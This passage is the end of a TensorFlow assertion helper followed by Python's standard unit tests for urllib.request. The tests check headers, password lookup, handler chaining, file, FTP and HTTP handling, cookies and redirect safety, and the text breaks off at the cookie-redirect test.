name: Name of the op and of the new `Tensor` if one is created.
Returns:
`tensor`, for chaining.
Raises:
ValueError: if `tensor` is not 0-D, of integer type.
"""
with ops.name_scope(name, 'assert_scalar_int', [tensor]) as name_scope:
tensor = ops.convert_to_tensor(tensor)
data_type = tensor.dtype
if not data_type.base_dtype.is_integer:
raise ValueError('Expected integer type for %s, received type: %s.'
% (tensor.name, data_type))
return check_ops.assert_scalar(tensor, name=name_scope)
| apache-2.0 |
kmolab/kmolab.github.io | data/Brython-3.3.4/Lib/test/test_urllib2.py | 24 | 61773 | import unittest
from test import support
import os
import io
import socket
import array
import sys
import urllib.request
# The proxy bypass method imported below has logic specific to the OSX
# proxy config data structure but is testable on all platforms.
from urllib.request import Request, OpenerDirector, _proxy_bypass_macosx_sysconf
import urllib.error
# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler
class TrivialTests(unittest.TestCase):
def test___all__(self):
# Verify which names are exposed
for module in 'request', 'response', 'parse', 'error', 'robotparser':
context = {}
exec('from urllib.%s import *' % module, context)
del context['__builtins__']
if module == 'request' and os.name == 'nt':
u, p = context.pop('url2pathname'), context.pop('pathname2url')
self.assertEqual(u.__module__, 'nturl2path')
self.assertEqual(p.__module__, 'nturl2path')
for k, v in context.items():
self.assertEqual(v.__module__, 'urllib.%s' % module,
"%r is exposed in 'urllib.%s' but defined in %r" %
(k, module, v.__module__))
def test_trivial(self):
# A couple trivial tests
self.assertRaises(ValueError, urllib.request.urlopen, 'bogus url')
# XXX Name hacking to get this to work on Windows.
fname = os.path.abspath(urllib.request.__file__).replace('\\', '/')
if os.name == 'nt':
file_url = "file:///%s" % fname
else:
file_url = "file://%s" % fname
f = urllib.request.urlopen(file_url)
f.read()
f.close()
def test_parse_http_list(self):
tests = [
('a,b,c', ['a', 'b', 'c']),
('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
('a, b, "c", "d", "e,f", g, h',
['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
('a="b\\"c", d="e\\,f", g="h\\\\i"',
['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
for string, list in tests:
self.assertEqual(urllib.request.parse_http_list(string), list)
def test_URLError_reasonstr(self):
err = urllib.error.URLError('reason')
self.assertIn(err.reason, str(err))
class RequestHdrsTests(unittest.TestCase):
def test_request_headers_dict(self):
"""
The Request.headers dictionary is not a documented interface. It
should stay that way, because the complete set of headers are only
accessible through the .get_header(), .has_header(), .header_items()
interface. However, .headers pre-dates those methods, and so real code
will be using the dictionary.
The introduction in 2.4 of those methods was a mistake for the same
reason: code that previously saw all (urllib2 user)-provided headers in
.headers now sees only a subset.
"""
url = "http://example.com"
self.assertEqual(Request(url,
headers={"Spam-eggs": "blah"}
).headers["Spam-eggs"], "blah")
self.assertEqual(Request(url,
headers={"spam-EggS": "blah"}
).headers["Spam-eggs"], "blah")
def test_request_headers_methods(self):
"""
Note the case normalization of header names here, to
.capitalize()-case. This should be preserved for
backwards-compatibility. (In the HTTP case, normalization to
.title()-case is done by urllib2 before sending headers to
http.client).
Note that e.g. r.has_header("spam-EggS") is currently False, and
r.get_header("spam-EggS") returns None, but that could be changed in
future.
Method r.remove_header should remove items both from r.headers and
r.unredirected_hdrs dictionaries
"""
url = "http://example.com"
req = Request(url, headers={"Spam-eggs": "blah"})
self.assertTrue(req.has_header("Spam-eggs"))
self.assertEqual(req.header_items(), [('Spam-eggs', 'blah')])
req.add_header("Foo-Bar", "baz")
self.assertEqual(sorted(req.header_items()),
[('Foo-bar', 'baz'), ('Spam-eggs', 'blah')])
self.assertFalse(req.has_header("Not-there"))
self.assertIsNone(req.get_header("Not-there"))
self.assertEqual(req.get_header("Not-there", "default"), "default")
def test_password_manager(self):
mgr = urllib.request.HTTPPasswordMgr()
add = mgr.add_password
find_user_pass = mgr.find_user_password
add("Some Realm", "http://example.com/", "joe", "password")
add("Some Realm", "http://example.com/ni", "ni", "ni")
add("c", "http://example.com/foo", "foo", "ni")
add("c", "http://example.com/bar", "bar", "nini")
add("b", "http://example.com/", "first", "blah")
add("b", "http://example.com/", "second", "spam")
add("a", "http://example.com", "1", "a")
add("Some Realm", "http://c.example.com:3128", "3", "c")
add("Some Realm", "d.example.com", "4", "d")
add("Some Realm", "e.example.com:3128", "5", "e")
self.assertEqual(find_user_pass("Some Realm", "example.com"),
('joe', 'password'))
#self.assertEqual(find_user_pass("Some Realm", "http://example.com/ni"),
# ('ni', 'ni'))
self.assertEqual(find_user_pass("Some Realm", "http://example.com"),
('joe', 'password'))
self.assertEqual(find_user_pass("Some Realm", "http://example.com/"),
('joe', 'password'))
self.assertEqual(
find_user_pass("Some Realm", "http://example.com/spam"),
('joe', 'password'))
self.assertEqual(
find_user_pass("Some Realm", "http://example.com/spam/spam"),
('joe', 'password'))
self.assertEqual(find_user_pass("c", "http://example.com/foo"),
('foo', 'ni'))
self.assertEqual(find_user_pass("c", "http://example.com/bar"),
('bar', 'nini'))
self.assertEqual(find_user_pass("b", "http://example.com/"),
('second', 'spam'))
# No special relationship between a.example.com and example.com:
self.assertEqual(find_user_pass("a", "http://example.com/"),
('1', 'a'))
self.assertEqual(find_user_pass("a", "http://a.example.com/"),
(None, None))
# Ports:
self.assertEqual(find_user_pass("Some Realm", "c.example.com"),
(None, None))
self.assertEqual(find_user_pass("Some Realm", "c.example.com:3128"),
('3', 'c'))
self.assertEqual(
find_user_pass("Some Realm", "http://c.example.com:3128"),
('3', 'c'))
self.assertEqual(find_user_pass("Some Realm", "d.example.com"),
('4', 'd'))
self.assertEqual(find_user_pass("Some Realm", "e.example.com:3128"),
('5', 'e'))
def test_password_manager_default_port(self):
"""
The point to note here is that we can't guess the default port if
there's no scheme. This applies to both add_password and
find_user_password.
"""
mgr = urllib.request.HTTPPasswordMgr()
add = mgr.add_password
find_user_pass = mgr.find_user_password
add("f", "http://g.example.com:80", "10", "j")
add("g", "http://h.example.com", "11", "k")
add("h", "i.example.com:80", "12", "l")
add("i", "j.example.com", "13", "m")
self.assertEqual(find_user_pass("f", "g.example.com:100"),
(None, None))
self.assertEqual(find_user_pass("f", "g.example.com:80"),
('10', 'j'))
self.assertEqual(find_user_pass("f", "g.example.com"),
(None, None))
self.assertEqual(find_user_pass("f", "http://g.example.com:100"),
(None, None))
self.assertEqual(find_user_pass("f", "http://g.example.com:80"),
('10', 'j'))
self.assertEqual(find_user_pass("f", "http://g.example.com"),
('10', 'j'))
self.assertEqual(find_user_pass("g", "h.example.com"), ('11', 'k'))
self.assertEqual(find_user_pass("g", "h.example.com:80"), ('11', 'k'))
self.assertEqual(find_user_pass("g", "http://h.example.com:80"),
('11', 'k'))
self.assertEqual(find_user_pass("h", "i.example.com"), (None, None))
self.assertEqual(find_user_pass("h", "i.example.com:80"), ('12', 'l'))
self.assertEqual(find_user_pass("h", "http://i.example.com:80"),
('12', 'l'))
self.assertEqual(find_user_pass("i", "j.example.com"), ('13', 'm'))
self.assertEqual(find_user_pass("i", "j.example.com:80"),
(None, None))
self.assertEqual(find_user_pass("i", "http://j.example.com"),
('13', 'm'))
self.assertEqual(find_user_pass("i", "http://j.example.com:80"),
(None, None))
class MockOpener:
addheaders = []
def open(self, req, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.req, self.data, self.timeout = req, data, timeout
def error(self, proto, *args):
self.proto, self.args = proto, args
class MockFile:
def read(self, count=None): pass
def readline(self, count=None): pass
def close(self): pass
class MockHeaders(dict):
def getheaders(self, name):
return list(self.values())
class MockResponse(io.StringIO):
def __init__(self, code, msg, headers, data, url=None):
io.StringIO.__init__(self, data)
self.code, self.msg, self.headers, self.url = code, msg, headers, url
def info(self):
return self.headers
def geturl(self):
return self.url
class MockCookieJar:
def add_cookie_header(self, request):
self.ach_req = request
def extract_cookies(self, response, request):
self.ec_req, self.ec_r = request, response
class FakeMethod:
def __init__(self, meth_name, action, handle):
self.meth_name = meth_name
self.handle = handle
self.action = action
def __call__(self, *args):
return self.handle(self.meth_name, self.action, *args)
class MockHTTPResponse(io.IOBase):
def __init__(self, fp, msg, status, reason):
self.fp = fp
self.msg = msg
self.status = status
self.reason = reason
self.code = 200
def read(self):
return ''
def info(self):
return {}
def geturl(self):
return self.url
class MockHTTPClass:
def __init__(self):
self.level = 0
self.req_headers = []
self.data = None
self.raise_on_endheaders = False
self._tunnel_headers = {}
def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.host = host
self.timeout = timeout
return self
def set_debuglevel(self, level):
self.level = level
def set_tunnel(self, host, port=None, headers=None):
self._tunnel_host = host
self._tunnel_port = port
if headers:
self._tunnel_headers = headers
else:
self._tunnel_headers.clear()
def request(self, method, url, body=None, headers=None):
self.method = method
self.selector = url
if headers is not None:
self.req_headers += headers.items()
self.req_headers.sort()
if body:
self.data = body
if self.raise_on_endheaders:
import socket
raise socket.error()
def getresponse(self):
return MockHTTPResponse(MockFile(), {}, 200, "OK")
def close(self):
pass
class MockHandler:
# useful for testing handler machinery
# see add_ordered_mock_handlers() docstring
handler_order = 500
def __init__(self, methods):
self._define_methods(methods)
def _define_methods(self, methods):
for spec in methods:
if len(spec) == 2: name, action = spec
else: name, action = spec, None
meth = FakeMethod(name, action, self.handle)
setattr(self.__class__, name, meth)
def handle(self, fn_name, action, *args, **kwds):
self.parent.calls.append((self, fn_name, args, kwds))
if action is None:
return None
elif action == "return self":
return self
elif action == "return response":
res = MockResponse(200, "OK", {}, "")
return res
elif action == "return request":
return Request("http://blah/")
elif action.startswith("error"):
code = action[action.rfind(" ")+1:]
try:
code = int(code)
except ValueError:
pass
res = MockResponse(200, "OK", {}, "")
return self.parent.error("http", args[0], res, code, "", {})
elif action == "raise":
raise urllib.error.URLError("blah")
assert False
def close(self): pass
def add_parent(self, parent):
self.parent = parent
self.parent.calls = []
def __lt__(self, other):
if not hasattr(other, "handler_order"):
# No handler_order, leave in original order. Yuck.
return True
return self.handler_order < other.handler_order
def add_ordered_mock_handlers(opener, meth_spec):
"""Create MockHandlers and add them to an OpenerDirector.
meth_spec: list of lists of tuples and strings defining methods to define
on handlers. eg:
[["http_error", "ftp_open"], ["http_open"]]
defines methods .http_error() and .ftp_open() on one handler, and
.http_open() on another. These methods just record their arguments and
return None. Using a tuple instead of a string causes the method to
perform some action (see MockHandler.handle()), eg:
[["http_error"], [("http_open", "return request")]]
defines .http_error() on one handler (which simply returns None), and
.http_open() on another handler, which returns a Request object.
"""
handlers = []
count = 0
for meths in meth_spec:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order += count
h.add_parent(opener)
count = count + 1
handlers.append(h)
opener.add_handler(h)
return handlers
def build_test_opener(*handler_instances):
opener = OpenerDirector()
for h in handler_instances:
opener.add_handler(h)
return opener
class MockHTTPHandler(urllib.request.BaseHandler):
# useful for testing redirections and auth
# sends supplied headers and code as first response
# sends 200 OK as second response
def __init__(self, code, headers):
self.code = code
self.headers = headers
self.reset()
def reset(self):
self._count = 0
self.requests = []
def http_open(self, req):
import email, http.client, copy
self.requests.append(copy.deepcopy(req))
if self._count == 0:
self._count = self._count + 1
name = http.client.responses[self.code]
msg = email.message_from_string(self.headers)
return self.parent.error(
"http", req, MockFile(), self.code, name, msg)
else:
self.req = req
msg = email.message_from_string("\r\n\r\n")
return MockResponse(200, "OK", msg, "", req.get_full_url())
class MockHTTPSHandler(urllib.request.AbstractHTTPHandler):
# Useful for testing the Proxy-Authorization request by verifying the
# properties of httpcon
def __init__(self):
urllib.request.AbstractHTTPHandler.__init__(self)
self.httpconn = MockHTTPClass()
def https_open(self, req):
return self.do_open(self.httpconn, req)
class MockPasswordManager:
def add_password(self, realm, uri, user, password):
self.realm = realm
self.url = uri
self.user = user
self.password = password
def find_user_password(self, realm, authuri):
self.target_realm = realm
self.target_url = authuri
return self.user, self.password
class OpenerDirectorTests(unittest.TestCase):
def test_add_non_handler(self):
class NonHandler(object):
pass
self.assertRaises(TypeError,
OpenerDirector().add_handler, NonHandler())
def test_badly_named_methods(self):
# test work-around for three methods that accidentally follow the
# naming conventions for handler methods
# (*_open() / *_request() / *_response())
# These used to call the accidentally-named methods, causing a
# TypeError in real code; here, returning self from these mock
# methods would either cause no exception, or AttributeError.
from urllib.error import URLError
o = OpenerDirector()
meth_spec = [
[("do_open", "return self"), ("proxy_open", "return self")],
[("redirect_request", "return self")],
]
add_ordered_mock_handlers(o, meth_spec)
o.add_handler(urllib.request.UnknownHandler())
for scheme in "do", "proxy", "redirect":
self.assertRaises(URLError, o.open, scheme+"://example.com/")
def test_handled(self):
# handler returning non-None means no more handlers will be called
o = OpenerDirector()
meth_spec = [
["http_open", "ftp_open", "http_error_302"],
["ftp_open"],
[("http_open", "return self")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
r = o.open(req)
# Second .http_open() gets called, third doesn't, since second returned
# non-None. Handlers without .http_open() never get any methods called
# on them.
# In fact, second mock handler defining .http_open() returns self
# (instead of response), which becomes the OpenerDirector's return
# value.
self.assertEqual(r, handlers[2])
calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
for expected, got in zip(calls, o.calls):
handler, name, args, kwds = got
self.assertEqual((handler, name), expected)
self.assertEqual(args, (req,))
def test_handler_order(self):
o = OpenerDirector()
handlers = []
for meths, handler_order in [
([("http_open", "return self")], 500),
(["http_open"], 0),
]:
class MockHandlerSubclass(MockHandler): pass
h = MockHandlerSubclass(meths)
h.handler_order = handler_order
handlers.append(h)
o.add_handler(h)
o.open("http://example.com/")
# handlers called in reverse order, thanks to their sort order
self.assertEqual(o.calls[0][0], handlers[1])
self.assertEqual(o.calls[1][0], handlers[0])
def test_raise(self):
# raising URLError stops processing of request
o = OpenerDirector()
meth_spec = [
[("http_open", "raise")],
[("http_open", "return self")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
self.assertRaises(urllib.error.URLError, o.open, req)
self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])
def test_http_error(self):
# XXX http_error_default
# http errors are a special case
o = OpenerDirector()
meth_spec = [
[("http_open", "error 302")],
[("http_error_400", "raise"), "http_open"],
[("http_error_302", "return response"), "http_error_303",
"http_error"],
[("http_error_302")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
class Unknown:
def __eq__(self, other): return True
req = Request("http://example.com/")
o.open(req)
assert len(o.calls) == 2
calls = [(handlers[0], "http_open", (req,)),
(handlers[2], "http_error_302",
(req, Unknown(), 302, "", {}))]
for expected, got in zip(calls, o.calls):
handler, method_name, args = expected
self.assertEqual((handler, method_name), got[:2])
self.assertEqual(args, got[2])
def test_processors(self):
# *_request / *_response methods get called appropriately
o = OpenerDirector()
meth_spec = [
[("http_request", "return request"),
("http_response", "return response")],
[("http_request", "return request"),
("http_response", "return response")],
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://example.com/")
o.open(req)
# processor methods are called on *all* handlers that define them,
# not just the first handler that handles the request
calls = [
(handlers[0], "http_request"), (handlers[1], "http_request"),
(handlers[0], "http_response"), (handlers[1], "http_response")]
for i, (handler, name, args, kwds) in enumerate(o.calls):
if i < 2:
# *_request
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 1)
self.assertIsInstance(args[0], Request)
else:
# *_response
self.assertEqual((handler, name), calls[i])
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], Request)
# response from opener.open is None, because there's no
# handler that defines http_open to handle it
self.assertTrue(args[1] is None or
isinstance(args[1], MockResponse))
def test_method_deprecations(self):
req = Request("http://www.example.com")
with self.assertWarns(DeprecationWarning):
req.add_data("data")
with self.assertWarns(DeprecationWarning):
req.get_data()
with self.assertWarns(DeprecationWarning):
req.has_data()
with self.assertWarns(DeprecationWarning):
req.get_host()
with self.assertWarns(DeprecationWarning):
req.get_selector()
with self.assertWarns(DeprecationWarning):
req.is_unverifiable()
with self.assertWarns(DeprecationWarning):
req.get_origin_req_host()
with self.assertWarns(DeprecationWarning):
req.get_type()
def sanepathname2url(path):
try:
path.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("path is not encodable to utf8")
urlpath = urllib.request.pathname2url(path)
if os.name == "nt" and urlpath.startswith("///"):
urlpath = urlpath[2:]
# XXX don't ask me about the mac...
return urlpath
class HandlerTests(unittest.TestCase):
def test_ftp(self):
class MockFTPWrapper:
def __init__(self, data): self.data = data
def retrfile(self, filename, filetype):
self.filename, self.filetype = filename, filetype
return io.StringIO(self.data), len(self.data)
def close(self): pass
class NullFTPHandler(urllib.request.FTPHandler):
def __init__(self, data): self.data = data
def connect_ftp(self, user, passwd, host, port, dirs,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.user, self.passwd = user, passwd
self.host, self.port = host, port
self.dirs = dirs
self.ftpwrapper = MockFTPWrapper(self.data)
return self.ftpwrapper
import ftplib
data = "rheum rhaponicum"
h = NullFTPHandler(data)
h.parent = MockOpener()
for url, host, port, user, passwd, type_, dirs, filename, mimetype in [
("ftp://localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://%25parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "%parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://%2542parrot@localhost/foo/bar/baz.html",
"localhost", ftplib.FTP_PORT, "%42parrot", "", "I",
["foo", "bar"], "baz.html", "text/html"),
("ftp://localhost:80/foo/bar/",
"localhost", 80, "", "", "D",
["foo", "bar"], "", None),
("ftp://localhost/baz.gif;type=a",
"localhost", ftplib.FTP_PORT, "", "", "A",
[], "baz.gif", None), # XXX really this should guess image/gif
]:
req = Request(url)
req.timeout = None
r = h.ftp_open(req)
# ftp authentication not yet implemented by FTPHandler
self.assertEqual(h.user, user)
self.assertEqual(h.passwd, passwd)
self.assertEqual(h.host, socket.gethostbyname(host))
self.assertEqual(h.port, port)
self.assertEqual(h.dirs, dirs)
self.assertEqual(h.ftpwrapper.filename, filename)
self.assertEqual(h.ftpwrapper.filetype, type_)
headers = r.info()
self.assertEqual(headers.get("Content-type"), mimetype)
self.assertEqual(int(headers["Content-length"]), len(data))
def test_file(self):
import email.utils, socket
h = urllib.request.FileHandler()
o = h.parent = MockOpener()
TESTFN = support.TESTFN
urlpath = sanepathname2url(os.path.abspath(TESTFN))
towrite = b"hello, world\n"
urls = [
"file://localhost%s" % urlpath,
"file://%s" % urlpath,
"file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
]
try:
localaddr = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
localaddr = ''
if localaddr:
urls.append("file://%s%s" % (localaddr, urlpath))
for url in urls:
f = open(TESTFN, "wb")
try:
try:
f.write(towrite)
finally:
f.close()
r = h.file_open(Request(url))
try:
data = r.read()
headers = r.info()
respurl = r.geturl()
finally:
r.close()
stats = os.stat(TESTFN)
modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
finally:
os.remove(TESTFN)
self.assertEqual(data, towrite)
self.assertEqual(headers["Content-type"], "text/plain")
self.assertEqual(headers["Content-length"], "13")
self.assertEqual(headers["Last-modified"], modified)
self.assertEqual(respurl, url)
for url in [
"file://localhost:80%s" % urlpath,
"file:///file_does_not_exist.txt",
"file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
os.getcwd(), TESTFN),
"file://somerandomhost.ontheinternet.com%s/%s" %
(os.getcwd(), TESTFN),
]:
try:
f = open(TESTFN, "wb")
try:
f.write(towrite)
finally:
f.close()
self.assertRaises(urllib.error.URLError,
h.file_open, Request(url))
finally:
os.remove(TESTFN)
h = urllib.request.FileHandler()
o = h.parent = MockOpener()
# XXXX why does // mean ftp (and /// mean not ftp!), and where
# is file: scheme specified? I think this is really a bug, and
# what was intended was to distinguish between URLs like:
# file:/blah.txt (a file)
# file://localhost/blah.txt (a file)
# file:///blah.txt (a file)
# file://ftp.example.com/blah.txt (an ftp URL)
for url, ftp in [
("file://ftp.example.com//foo.txt", False),
("file://ftp.example.com///foo.txt", False),
# XXXX bug: fails with OSError, should be URLError
("file://ftp.example.com/foo.txt", False),
("file://somehost//foo/something.txt", False),
("file://localhost//foo/something.txt", False),
]:
req = Request(url)
try:
h.file_open(req)
# XXXX remove OSError when bug fixed
except (urllib.error.URLError, OSError):
self.assertFalse(ftp)
else:
self.assertIs(o.req, req)
self.assertEqual(req.type, "ftp")
self.assertEqual(req.type == "ftp", ftp)
def test_http(self):
h = urllib.request.AbstractHTTPHandler()
o = h.parent = MockOpener()
url = "http://example.com/"
for method, data in [("GET", None), ("POST", b"blah")]:
req = Request(url, data, {"Foo": "bar"})
req.timeout = None
req.add_unredirected_header("Spam", "eggs")
http = MockHTTPClass()
r = h.do_open(http, req)
# result attributes
r.read; r.readline # wrapped MockFile methods
r.info; r.geturl # addinfourl methods
r.code, r.msg == 200, "OK" # added from MockHTTPClass.getreply()
hdrs = r.info()
hdrs.get; hdrs.__contains__ # r.info() gives dict from .getreply()
self.assertEqual(r.geturl(), url)
self.assertEqual(http.host, "example.com")
self.assertEqual(http.level, 0)
self.assertEqual(http.method, method)
self.assertEqual(http.selector, "/")
self.assertEqual(http.req_headers,
[("Connection", "close"),
("Foo", "bar"), ("Spam", "eggs")])
self.assertEqual(http.data, data)
# check socket.error converted to URLError
http.raise_on_endheaders = True
self.assertRaises(urllib.error.URLError, h.do_open, http, req)
# Check for TypeError on POST data which is str.
req = Request("http://example.com/","badpost")
self.assertRaises(TypeError, h.do_request_, req)
# check adding of standard headers
o.addheaders = [("Spam", "eggs")]
for data in b"", None: # POST, GET
req = Request("http://example.com/", data)
r = MockResponse(200, "OK", {}, "")
newreq = h.do_request_(req)
if data is None: # GET
self.assertNotIn("Content-length", req.unredirected_hdrs)
self.assertNotIn("Content-type", req.unredirected_hdrs)
else: # POST
self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
self.assertEqual(req.unredirected_hdrs["Content-type"],
"application/x-www-form-urlencoded")
# XXX the details of Host could be better tested
self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")
# don't clobber existing headers
req.add_unredirected_header("Content-length", "foo")
req.add_unredirected_header("Content-type", "bar")
req.add_unredirected_header("Host", "baz")
req.add_unredirected_header("Spam", "foo")
newreq = h.do_request_(req)
self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
self.assertEqual(req.unredirected_hdrs["Host"], "baz")
self.assertEqual(req.unredirected_hdrs["Spam"], "foo")
# Check iterable body support
def iterable_body():
yield b"one"
yield b"two"
yield b"three"
for headers in {}, {"Content-Length": 11}:
req = Request("http://example.com/", iterable_body(), headers)
if not headers:
# Having an iterable body without a Content-Length should
# raise an exception
self.assertRaises(ValueError, h.do_request_, req)
else:
newreq = h.do_request_(req)
# A file object.
# Test only Content-Length attribute of request.
file_obj = io.BytesIO()
file_obj.write(b"Something\nSomething\nSomething\n")
for headers in {}, {"Content-Length": 30}:
req = Request("http://example.com/", file_obj, headers)
if not headers:
# Having an iterable body without a Content-Length should
# raise an exception
self.assertRaises(ValueError, h.do_request_, req)
else:
newreq = h.do_request_(req)
self.assertEqual(int(newreq.get_header('Content-length')),30)
file_obj.close()
# array.array Iterable - Content Length is calculated
iterable_array = array.array("I",[1,2,3,4])
for headers in {}, {"Content-Length": 16}:
req = Request("http://example.com/", iterable_array, headers)
newreq = h.do_request_(req)
self.assertEqual(int(newreq.get_header('Content-length')),16)
def test_http_doubleslash(self):
# Checks the presence of any unnecessary double slash in url does not
# break anything. Previously, a double slash directly after the host
# could cause incorrect parsing.
h = urllib.request.AbstractHTTPHandler()
h.parent = MockOpener()
data = b""
ds_urls = [
"http://example.com/foo/bar/baz.html",
"http://example.com//foo/bar/baz.html",
"http://example.com/foo//bar/baz.html",
"http://example.com/foo/bar//baz.html"
]
for ds_url in ds_urls:
ds_req = Request(ds_url, data)
# Check whether host is determined correctly if there is no proxy
np_ds_req = h.do_request_(ds_req)
self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com")
# Check whether host is determined correctly if there is a proxy
ds_req.set_proxy("someproxy:3128",None)
p_ds_req = h.do_request_(ds_req)
self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")
def test_fixpath_in_weirdurls(self):
# Issue4493: urllib2 to supply '/' when to urls where path does not
# start with'/'
h = urllib.request.AbstractHTTPHandler()
h.parent = MockOpener()
weird_url = 'http://www.python.org?getspam'
req = Request(weird_url)
newreq = h.do_request_(req)
self.assertEqual(newreq.host,'www.python.org')
self.assertEqual(newreq.selector,'/?getspam')
url_without_path = 'http://www.python.org'
req = Request(url_without_path)
newreq = h.do_request_(req)
self.assertEqual(newreq.host,'www.python.org')
self.assertEqual(newreq.selector,'')
def test_errors(self):
h = urllib.request.HTTPErrorProcessor()
o = h.parent = MockOpener()
url = "http://example.com/"
req = Request(url)
# all 2xx are passed through
r = MockResponse(200, "OK", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
r = MockResponse(202, "Accepted", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
r = MockResponse(206, "Partial content", {}, "", url)
newr = h.http_response(req, r)
self.assertIs(r, newr)
self.assertFalse(hasattr(o, "proto")) # o.error not called
# anything else calls o.error (and MockOpener returns None, here)
r = MockResponse(502, "Bad gateway", {}, "", url)
self.assertIsNone(h.http_response(req, r))
self.assertEqual(o.proto, "http") # o.error called
self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))
def test_cookies(self):
cj = MockCookieJar()
h = urllib.request.HTTPCookieProcessor(cj)
h.parent = MockOpener()
req = Request("http://example.com/")
r = MockResponse(200, "OK", {}, "")
newreq = h.http_request(req)
self.assertIs(cj.ach_req, req)
self.assertIs(cj.ach_req, newreq)
self.assertEqual(req.origin_req_host, "example.com")
self.assertFalse(req.unverifiable)
newr = h.http_response(req, r)
self.assertIs(cj.ec_req, req)
self.assertIs(cj.ec_r, r)
self.assertIs(r, newr)
def test_redirect(self):
from_url = "http://example.com/a.html"
to_url = "http://example.com/b.html"
h = urllib.request.HTTPRedirectHandler()
o = h.parent = MockOpener()
# ordinary redirect behaviour
for code in 301, 302, 303, 307:
for data in None, "blah\nblah\n":
method = getattr(h, "http_error_%s" % code)
req = Request(from_url, data)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
req.add_header("Nonsense", "viking=withhold")
if data is not None:
req.add_header("Content-Length", str(len(data)))
req.add_unredirected_header("Spam", "spam")
try:
method(req, MockFile(), code, "Blah",
MockHeaders({"location": to_url}))
except urllib.error.HTTPError:
# 307 in response to POST requires user OK
self.assertTrue(code == 307 and data is not None)
self.assertEqual(o.req.get_full_url(), to_url)
try:
self.assertEqual(o.req.get_method(), "GET")
except AttributeError:
self.assertFalse(o.req.data)
# now it's a GET, there should not be headers regarding content
# (possibly dragged from before being a POST)
headers = [x.lower() for x in o.req.headers]
self.assertNotIn("content-length", headers)
self.assertNotIn("content-type", headers)
self.assertEqual(o.req.headers["Nonsense"],
"viking=withhold")
self.assertNotIn("Spam", o.req.headers)
self.assertNotIn("Spam", o.req.unredirected_hdrs)
# loop detection
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
def redirect(h, req, url=to_url):
h.http_error_302(req, MockFile(), 302, "Blah",
MockHeaders({"location": url}))
# Note that the *original* request shares the same record of
# redirections with the sub-requests caused by the redirections.
# detect infinite loop redirect of a URL to itself
req = Request(from_url, origin_req_host="example.com")
count = 0
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
try:
while 1:
redirect(h, req, "http://example.com/")
count = count + 1
except urllib.error.HTTPError:
# don't stop until max_repeats, because cookies may introduce state
self.assertEqual(count, urllib.request.HTTPRedirectHandler.max_repeats)
# detect endless non-repeating chain of redirects
req = Request(from_url, origin_req_host="example.com")
count = 0
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
try:
while 1:
redirect(h, req, "http://example.com/%d" % count)
count = count + 1
except urllib.error.HTTPError:
self.assertEqual(count,
urllib.request.HTTPRedirectHandler.max_redirections)
def test_invalid_redirect(self):
from_url = "http://example.com/a.html"
valid_schemes = ['http','https','ftp']
invalid_schemes = ['file','imap','ldap']
schemeless_url = "example.com/b.html"
h = urllib.request.HTTPRedirectHandler()
o = h.parent = MockOpener()
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
for scheme in invalid_schemes:
invalid_url = scheme + '://' + schemeless_url
self.assertRaises(urllib.error.HTTPError, h.http_error_302,
req, MockFile(), 302, "Security Loophole",
MockHeaders({"location": invalid_url}))
for scheme in valid_schemes:
valid_url = scheme + '://' + schemeless_url
h.http_error_302(req, MockFile(), 302, "That's fine",
MockHeaders({"location": valid_url}))
self.assertEqual(o.req.get_full_url(), valid_url)
def test_relative_redirect(self):
from_url = "http://example.com/a.html"
relative_url = "/b.html"
h = urllib.request.HTTPRedirectHandler()
o = h.parent = MockOpener()
req = Request(from_url)
req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
valid_url = urllib.parse.urljoin(from_url,relative_url)
h.http_error_302(req, MockFile(), 302, "That's fine",
MockHeaders({"location": valid_url}))
self.assertEqual(o.req.get_full_url(), valid_url)
def test_cookie_redirect(self):
# cookies shouldn't leak into redirected requests
from http.cookiejar import CookieJar
